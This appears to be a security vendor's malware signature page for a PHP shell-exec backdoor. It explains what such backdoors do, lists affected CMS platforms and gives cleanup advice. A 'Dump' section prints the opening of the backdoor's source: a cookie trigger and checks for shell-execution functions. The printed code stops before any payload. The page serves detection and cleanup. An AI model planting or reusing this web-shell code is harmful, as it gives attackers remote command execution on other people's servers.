Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.shell-exec.001.002

php.backdoor.shell-exec.001.002

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.
This kind of backdoor allows attackers to run remote commands in the server shell. Depeding on the level of the user that runs the web server, the attacker can have full control of the machine or leverage access to a higher user.

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which can be found in your system by searching for shell_exec() or system() functions inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.

Dump

<?php
//curl -v --cookie "XERATUTA=w" URL
//adjust system variables
if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
//die with error
function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
//check if we can exec
define('has_passthru',@function_exists('passthru'));
define('has_system',@function_exists('system'));
define('has_shell_exec',@function_exists('shell_exec'));
define('has_popen',@function_exists('popen'));
define('has_proc_open',@function_exists('proc_open'));
define('has_exec',@function_exists('exec'));
define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
if(!can_exec){x_die('can not exec: no functions available');}
//check if we can config